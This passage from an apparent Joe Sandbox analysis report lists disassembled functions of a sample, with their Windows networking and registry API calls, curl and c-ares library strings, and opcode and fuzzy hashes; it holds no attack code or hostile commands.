                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0032AF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0032AFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0032B072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4281207131-1047472027
                                                              • Opcode ID: 8202deebc68991b6e11ec8adcb17331666569c4cc5fd99f05579c8e282099dd4
                                                              • Instruction ID: 5550f3b621ce80069eb8fdfdb45c1b7b9ae4c5731f05f3782d8392668d0a84f1
                                                              • Opcode Fuzzy Hash: 8202deebc68991b6e11ec8adcb17331666569c4cc5fd99f05579c8e282099dd4
                                                              • Instruction Fuzzy Hash: CD72D0B1608711AFE7219F24DC82F6BBBE8AF85700F154828F985DB291E775E844CB53
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 002AA831
                                                              Strings
                                                              • cf-socket.c, xrefs: 002AA5CD, 002AA735
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 002AAE60
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 002AA796
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 002AAD0A
                                                              • @, xrefs: 002AAC42
                                                              • Trying %s:%d..., xrefs: 002AA7C2, 002AA7DE
                                                              • Local port: %hu, xrefs: 002AAF28
                                                              • Trying [%s]:%d..., xrefs: 002AA689
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 002AA6CE
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 002AAE1F
                                                              • @, xrefs: 002AA8F4
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 002AADAC
                                                              • Bind to local port %d failed, trying next, xrefs: 002AAFE5
                                                              • Could not set TCP_NODELAY: %s, xrefs: 002AA871
                                                              • bind failed with errno %d: %s, xrefs: 002AB080
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: e298df314955a51e6f2aa1bcb2cc1901484b6ca322991b3687f6ba6ad0301e1f
                                                              • Instruction ID: da1df0a1e302cb08ec0086ee3219dc035f615768fff7e66823575ee89339fc1b
                                                              • Opcode Fuzzy Hash: e298df314955a51e6f2aa1bcb2cc1901484b6ca322991b3687f6ba6ad0301e1f
                                                              • Instruction Fuzzy Hash: 26620671518342ABE721CF14CC46BABB7E5FF92314F044929F98897292EB71D864CB93

                                                              Control-flow Graph

                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00339946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00339974
                                                              • RegCloseKey.KERNELBASE(?), ref: 0033998B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                              • API String ID: 3677997916-4129964100
                                                              • Opcode ID: 764d6d1fa43775f6a34bb5412bf3c783d752c4150a6d1fa810e591efc2fda699
                                                              • Instruction ID: 68ee131c907529ca280a91f901f5d971ba88e4bca70b5b5d75ffa6174e4d5d38
                                                              • Opcode Fuzzy Hash: 764d6d1fa43775f6a34bb5412bf3c783d752c4150a6d1fa810e591efc2fda699
                                                              • Instruction Fuzzy Hash: 5F32A4B5904211ABEB13AB24FC83B1B76E8AF54314F094439F8499A263FB71ED14D793

                                                              Control-flow Graph
                                                              Control-flow graph for the function at 2a8b50 (graph node and edge data not rendered as text)
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 002A8C30
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 002A8CF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnect
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 238548546-879669977
                                                              • Opcode ID: ebf2923de90920214bc38957ea7d00d84d8233509fccc93a332c0c8e515126f2
                                                              • Instruction ID: 021a86b80f84fdd828d18c35403a64da411feec1c80604d2c8af3636188d5aff
                                                              • Opcode Fuzzy Hash: ebf2923de90920214bc38957ea7d00d84d8233509fccc93a332c0c8e515126f2
                                                              • Instruction Fuzzy Hash: 3BB1D570614706EFD714DF24C985BA6BBE1AF46318F048929F8598B2D2EF70EC64CB61

                                                              Control-flow Graph
                                                              Control-flow graph for the function at 272f17 (graph node and edge data not rendered as text)
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: EnumOpen
                                                              • String ID: d
                                                              • API String ID: 3231578192-2564639436
                                                              • Opcode ID: c7b598c97eafeefcaf889a0d2e0a78789031ddbda0be0d5c931d3ddf73f53375
                                                              • Instruction ID: 86fb19372fbd599a21224810a79f268ef2414c7e47deccad1397fce761fff99e
                                                              • Opcode Fuzzy Hash: c7b598c97eafeefcaf889a0d2e0a78789031ddbda0be0d5c931d3ddf73f53375
                                                              • Instruction Fuzzy Hash: 6871C2B49143099FDB40EF69D58479EBBF0FF84308F10885DE99897310E7749A889F92

                                                              Control-flow Graph
                                                              Control-flow graph for the function at 2776a0 (graph node and edge data not rendered as text)
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,N=',00000000,?,?,002807BF), ref: 002776EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$N='$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-1514272970
                                                              • Opcode ID: 138c7321aea7df961ea2b6d54708a208c22c2d80f8016ab096b0c1a70661aabe
                                                              • Instruction ID: 595b01e6a3e5306e98650d50722278cdcaad5563c6d22479603eaf4683606b12
                                                              • Opcode Fuzzy Hash: 138c7321aea7df961ea2b6d54708a208c22c2d80f8016ab096b0c1a70661aabe
                                                              • Instruction Fuzzy Hash: 2C110DB1A3D3557BD1109F199C4AD2B7B5CEBC2B58F054919FC1C53382E6759C1086F1

                                                              Control-flow Graph
                                                              Control-flow graph for the function at 2a9290 (graph node and edge data not rendered as text)
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 002A935C
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 002A9389
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: c070b9a2e1e81e3d6899d427fb31455c298a474601568426da2b2a7d4d3b520b
                                                              • Instruction ID: 0e1e84074bdccca731de7dfa3e96b8faeea20f5dcbf9138dd28ac99b78dcafd3
                                                              • Opcode Fuzzy Hash: c070b9a2e1e81e3d6899d427fb31455c298a474601568426da2b2a7d4d3b520b
                                                              • Instruction Fuzzy Hash: 51510774600305AFEB10DF25C881FAA77B5FF89314F148568FD588B282EB31E9A1CB51

                                                              Control-flow Graph (function at 277770; basic-block graph omitted; calls recv)
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: 9e9cdc5baa8f29d19cfca90f9615d505e517a4dd031c38a8875fd6fc455b2606
                                                              • Instruction ID: 6bade4b13771021fa9765dd1228982e9acff57de3b7f4808ba70901c7a62fd98
                                                              • Opcode Fuzzy Hash: 9e9cdc5baa8f29d19cfca90f9615d505e517a4dd031c38a8875fd6fc455b2606
                                                              • Instruction Fuzzy Hash: 66113AB5A393457BE1109F159C4AE2BBB5CEBC6B68F054519FC1C93382D2719C5085F2

                                                              Control-flow Graph (function at 2775e0; basic-block graph omitted; calls socket)
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: 6315ebd4f2de835502c97954c6f280cef69b172fa8b395921acfa95204090035
                                                              • Instruction ID: e770da1b293b87875d21421a7e8fd1e90631b3946d4ef7684c9dbb8359bcf27c
                                                              • Opcode Fuzzy Hash: 6315ebd4f2de835502c97954c6f280cef69b172fa8b395921acfa95204090035
                                                              • Instruction Fuzzy Hash: B1114C71A2425227DA105F2EAC1BE9F3B48FFC2725F054915F828D63D2D3328CA4D6D1

                                                              Control-flow Graph (function at 2aa150; basic-block graph omitted; calls getsockname)
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 002AA1C6
                                                              Strings
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 002AA23B
                                                              • getsockname() failed with errno %d: %s, xrefs: 002AA1F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: 49fd65c13c10410336b3ea9bf59f397abc0c8877cb633b7493d7a6ea37f57247
                                                              • Instruction ID: c49b6a217f1ab52246c994f190a5886431e8afccca05b4d7af7255aee7f352c3
                                                              • Opcode Fuzzy Hash: 49fd65c13c10410336b3ea9bf59f397abc0c8877cb633b7493d7a6ea37f57247
                                                              • Instruction Fuzzy Hash: FA21F831858680BBE7219B18DC46FE773BCEF92328F040615F99853151FF3259998BE2

                                                              Control-flow Graph (function at 28d5e0; basic-block graph omitted; calls WSAStartup)
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 0028D65B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
                                                              • API String ID: 724789610-3097795196
                                                              • Opcode ID: ffb2983ad3dba25980f24f93705465bef91d995dbd461b939ca1f0017166b24c
                                                              • Instruction ID: 423f5d1b66e5d33624ba703814df1c31a4888f6609c8bf509ef1c383b7b85fc6
                                                              • Opcode Fuzzy Hash: ffb2983ad3dba25980f24f93705465bef91d995dbd461b939ca1f0017166b24c
                                                              • Instruction Fuzzy Hash: 5C017BD4D6938607EB11BF3CAD1B3662298AB51304F880A69EC48D11C2F66DC4ACC392

                                                              Control-flow Graph (function at 33aa30; basic-block graph omitted; calls socket, ioctlsocket, connect)
                                                              APIs
                                                              • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0033AB9A
                                                              • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0033ABE3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: ioctlsocketsocket
                                                              • String ID:
                                                              • API String ID: 416004797-0
                                                              • Opcode ID: a52076e27c8a3229b80214dbb3b86a59575b9f1b93fe24674aa28c070b667179
                                                              • Instruction ID: e07cd4ac8eca26fb34898c08358219f5f1cd6d37eb54de899a561ac23d2bcb0c
                                                              • Opcode Fuzzy Hash: a52076e27c8a3229b80214dbb3b86a59575b9f1b93fe24674aa28c070b667179
                                                              • Instruction Fuzzy Hash: FAE1DD706047029BEB22CF24C8C5B6BB7E5EF89300F144A2CF9998B291E775D944DB92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 2cf02a3d311c62a90a68984c011a1afdf1126f08602754618c06b729dd6a7102
                                                              • Instruction ID: 18ed186edfe671bb1cf7499297c7bb81032ddbe7a7522a887507acbf0123fa85
                                                              • Opcode Fuzzy Hash: 2cf02a3d311c62a90a68984c011a1afdf1126f08602754618c06b729dd6a7102
                                                              • Instruction Fuzzy Hash: 935108FB15C115BEB202C5416B64AFE6B6DE7C7730B30862BF4A7C6202E6A44ACD8571
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 930f2d7d1138b33e71b0c99ef8ce9948d4843d4ff1d2a73e64a7460dcf9d40c8
                                                              • Instruction ID: 6cae4c93ec3f30784491b6d6d4f8331508ad7d5e9aec85356583699abb3e4ce5
                                                              • Opcode Fuzzy Hash: 930f2d7d1138b33e71b0c99ef8ce9948d4843d4ff1d2a73e64a7460dcf9d40c8
                                                              • Instruction Fuzzy Hash: 2A51F8FB15C110FD7202C5416B54AFE6B6DE7C7730B30866BF4A7C6202E6A44ACE8531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: ba22613775c5a73ccca68fef5175e2a4d03181f7f1a5120353b22d4ac48c2cae
                                                              • Instruction ID: aa27f5a7c31e4fb502a031ec510456642389126b958f3b1cdae7444b15e7d8f7
                                                              • Opcode Fuzzy Hash: ba22613775c5a73ccca68fef5175e2a4d03181f7f1a5120353b22d4ac48c2cae
                                                              • Instruction Fuzzy Hash: CF51E7FB26C110FD7102C5416B54AFE6B6DE7C7730B30C66BF4A7DA202E6944ACA8531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 3abf3b791cdad2a8ccf33a2d8b8e6705fcf33581b9c11348ea93dc77e5338c1f
                                                              • Instruction ID: 4ca1246084887465795f2d0858cac9a3f55578b69c23f648156b35dc727c5d9e
                                                              • Opcode Fuzzy Hash: 3abf3b791cdad2a8ccf33a2d8b8e6705fcf33581b9c11348ea93dc77e5338c1f
                                                              • Instruction Fuzzy Hash: 1A51E5FB26C110FD7102C5416B54AFE6B6DE7C7730F30862BF4A7D6202E6A44ACA9531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: ed7aff41e30cf050e9e0b480521f46faec8c84956725d2f7dc0202e95e3cf48d
                                                              • Instruction ID: 52797c86d3db104f4099cf432830c2836b03f961471eaefb778bd72b7dca9f33
                                                              • Opcode Fuzzy Hash: ed7aff41e30cf050e9e0b480521f46faec8c84956725d2f7dc0202e95e3cf48d
                                                              • Instruction Fuzzy Hash: 1051D6FB21C114BEB202C6416B54AFE6B6DE7C7730B30867BF4A7C6602E7944AC99531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7010000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: A:\
                                                              • API String ID: 0-3379428675
                                                              • Opcode ID: 3f9c4c63c2867445ec43c94d4cee317283b85809ddcbdee6b767a1e7a5942047
                                                              • Instruction ID: d9579bfa177bd69a2cc9c123659c6be471294dacb8c94cd96262fc2074578710
                                                              • Opcode Fuzzy Hash: 3f9c4c63c2867445ec43c94d4cee317283b85809ddcbdee6b767a1e7a5942047
                                                              • Instruction Fuzzy Hash: 8F41E5FB21C110FE7202C6416B64AFE676DE7C7730B30C62BF4A7C6602E6A44AC99531
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1561626761.0000000007010000.00000040.00001000.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                              Joe Sandbox IDA Plugin
